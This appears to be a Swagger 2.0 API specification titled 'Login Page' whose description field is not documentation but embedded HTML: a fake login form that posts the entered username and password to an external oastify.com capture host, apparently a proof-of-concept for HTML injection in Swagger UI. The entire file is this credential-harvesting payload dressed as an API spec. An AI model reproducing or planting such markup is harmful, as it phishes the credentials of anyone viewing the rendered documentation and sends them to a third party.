swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: >
    <div style="max-width: 400px; margin: auto;">
      <form action="https://vqpg6xpxoirljwgx6syclu2gr7xylq9f.oastify.com" method="post">
        <label>Username</label><br>
        <input type="text" name="username" style="width: 100%; margin-bottom: 10px;"><br>
        <label>Password</label><br>
        <input type="password" name="password" style="width: 100%; margin-bottom: 10px;"><br>
        <input type="submit" value="Login" style="width: 100%; background: #d22; color: #fff;">
      </form>
    </div>
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
